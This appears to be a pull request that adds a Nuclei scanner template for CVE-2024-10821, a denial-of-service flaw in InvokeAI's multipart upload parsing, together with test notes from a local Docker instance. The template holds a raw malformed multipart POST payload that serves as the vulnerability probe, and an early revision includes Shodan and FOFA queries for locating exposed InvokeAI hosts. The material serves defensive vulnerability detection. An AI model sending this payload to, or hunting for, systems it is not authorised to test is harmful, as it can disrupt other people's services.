### PR TITLE
Add CVE-2024-10821 Template

### DIFF
--- a/http/cves/2024/CVE-2024-10821.yaml
+++ b/http/cves/2024/CVE-2024-10821.yaml
@@ -1,0 +1,61 @@
+id: CVE-2024-10821
+
+info:
+  name: InvokeAI Multipart Boundary Parsing DoS
+  author: yourname
+  severity: high
+  description: |
+    InvokeAI is vulnerable to a denial of service caused by improper multipart boundary parsing.
+    An attacker can append arbitrary characters to the multipart boundary terminator,
+    resulting in excessive resource consumption and service disruption.
+  impact: |
+    Successful exploitation may cause the server to become unresponsive,
+    leading to denial of service conditions.
+  remediation: |
+    Upgrade to a patched version of InvokeAI that properly validates multipart boundaries.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-10821
+    - https://huntr.com/bounties/0ac24835-c4c0-4f11-938a-d5641dfb80b2
+  classification:
+    cve-id: CVE-2024-10821
+    cwe-id: CWE-835
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: invokeai
+    product: invokeai
+    shodan-query: title:"InvokeAI"
+    fofa-query: title="InvokeAI"
+  tags: cve,cve2024,invokeai,dos,multipart
+
+http:
+  - raw:
+      - |
+        POST /api/v1/images/upload HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=BOUNDARY
+        Connection: close
+
+        --BOUNDARY
+        Content-Disposition: form-data; name="file"; filename="test.txt"
+        Content-Type: text/plain
+
+        test
+        --BOUNDARY--XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 400
+          - 408
+          - 500
+
+      - type: word
+        part: body
+        words:
+          - "multipart"
+          - "boundary"
+        condition: or
+
+    stop-at-first-match: true

--- a/http/cves/2024/CVE-2024-10821.yaml
+++ b/http/cves/2024/CVE-2024-10821.yaml
@@ -1,3 +1,4 @@
+```yaml id="cq9qj5"
 id: CVE-2024-10821
 
 info:
@@ -6,13 +7,6 @@ info:
   severity: high
   description: |
     InvokeAI is vulnerable to a denial of service caused by improper multipart boundary parsing.
-    An attacker can append arbitrary characters to the multipart boundary terminator,
-    resulting in excessive resource consumption and service disruption.
-  impact: |
-    Successful exploitation may cause the server to become unresponsive,
-    leading to denial of service conditions.
-  remediation: |
-    Upgrade to a patched version of InvokeAI that properly validates multipart boundaries.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2024-10821
     - https://huntr.com/bounties/0ac24835-c4c0-4f11-938a-d5641dfb80b2
@@ -24,14 +18,12 @@ info:
     max-request: 1
     vendor: invokeai
     product: invokeai
-    shodan-query: title:"InvokeAI"
-    fofa-query: title="InvokeAI"
   tags: cve,cve2024,invokeai,dos,multipart
 
 http:
   - raw:
       - |
-        POST /api/v1/images/upload HTTP/1.1
+        POST /api/v1/images/upload?image_category=general&is_intermediate=false HTTP/1.1
         Host: {{Hostname}}
         Content-Type: multipart/form-data; boundary=BOUNDARY
         Connection: close
@@ -43,7 +35,7 @@ http:
         test
         --BOUNDARY--XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
 
-    matchers-condition: and
+    matchers-condition: or
     matchers:
       - type: status
         status:
@@ -56,6 +48,6 @@ http:
         words:
           - "multipart"
           - "boundary"
+          - "error"
         condition: or
-
-    stop-at-first-match: true
+```

--- a/http/cves/2024/CVE-2024-10821.yaml
+++ b/http/cves/2024/CVE-2024-10821.yaml
@@ -1,9 +1,8 @@
-```yaml id="cq9qj5"
 id: CVE-2024-10821
 
 info:
   name: InvokeAI Multipart Boundary Parsing DoS
-  author: yourname
+  author: sonshn
   severity: high
   description: |
     InvokeAI is vulnerable to a denial of service caused by improper multipart boundary parsing.
@@ -50,4 +49,3 @@ http:
           - "boundary"
           - "error"
         condition: or
-```

--- a/http/cves/2024/CVE-2024-10821.yaml
+++ b/http/cves/2024/CVE-2024-10821.yaml
@@ -1,4 +1,3 @@
-```yaml id="cq9qj5"
 id: CVE-2024-10821
 
 info:
@@ -50,4 +49,3 @@ http:
           - "boundary"
           - "error"
         condition: or
-```


### PR DESCRIPTION
### PR Information

* Added CVE-2024-10821 template for InvokeAI multipart boundary parsing denial of service vulnerability.
* The template performs a lightweight malformed multipart request to safely detect vulnerable boundary parsing behavior without triggering actual resource exhaustion.
* **Severity**: High (CVSS 7.5)
* **References**:

  * https://nvd.nist.gov/vuln/detail/CVE-2024-10821
  * https://huntr.com/bounties/0ac24835-c4c0-4f11-938a-d5641dfb80b2

### Template validation

* [ ] Validated with a host running a vulnerable version and/or configuration (True Positive)
* [x] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details (leave it blank if not applicable)

* The template avoids destructive denial-of-service behavior by using a minimal malformed multipart boundary payload.

* Validation performed using:

  ```bash
  nuclei -validate -t http/cves/2024/CVE-2024-10821.yaml
  ```

* Debug execution:

  ```bash
  nuclei -u http://localhost:9090 -t http/cves/2024/CVE-2024-10821.yaml -debug
  ```

* For more details, refer text and screenshots in 'Test Evidence'

#### Test Evidence
> [!NOTE]
> OS: Ubuntu 16.04 LTS
> Docker: 18.09.7
> InvokeAI: latest

-  Validation
<img width="908" height="226" alt="image" src="https://github.com/user-attachments/assets/c00db4a9-b8e9-4230-80c2-5c9355096202" />

- Installed InvokeAI Docker image
<img width="908" height="395" alt="image" src="https://github.com/user-attachments/assets/d96b42c3-89df-480c-a661-e90857d572dd" />

- Run invokeai image in background
```bash
  sudo docker run --rm -it \
  >   --name invokeai-vuln \
  >   -p 9090:9090 \
  >   --security-opt seccomp=unconfined \
  >   -e OPENBLAS_NUM_THREADS=1 \
  >   -e OMP_NUM_THREADS=1 \
  >   -e MKL_NUM_THREADS=1 \
  >   ghcr.io/invoke-ai/invokeai:latest
  ```

<img width="908" height="434" alt="image" src="https://github.com/user-attachments/assets/6401e344-9515-48dc-8db9-130dced98cc0" />

- Send ordinary request
```bash
curl -X POST   "http://localhost:9090/api/v1/images/upload?image_category=general&is_intermediate=false"   -F "file=@../../Desktop/AlstromPoint.jpg"
```

- Example Response
```JSON
{
    "image_name":"dafd81dc-33af-4169-890f-105b8fddfed0.png",
    "image_url":"api/v1/images/i/dafd81dc-33af-4169-890f-105b8fddfed0.png/full",
    "thumbnail_url":"api/v1/images/i/dafd81dc-33af-4169-890f-105b8fddfed0.png/thumbnail",
    "image_origin":"external",
    "image_category":"general",
    "width":2560,
    "height":1440,
    "created_at":"2026-05-29 17:16:10.239",
    "updated_at":"2026-05-29 17:16:10.239",
    "deleted_at":null,
    "is_intermediate":false,
    "session_id":null,
    "node_id":null,
    "starred":false,
    "has_workflow":false,
    "image_subfolder":"",
    "board_id":null
}
```

- Debug
<img width="908" height="291" alt="image" src="https://github.com/user-attachments/assets/a37105fb-736f-4cf0-8b3a-836597ac4a12" />

#### Conclusion

It seems CVD-2024-10821 is patched in latest version of InvokeAI Docker image.

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)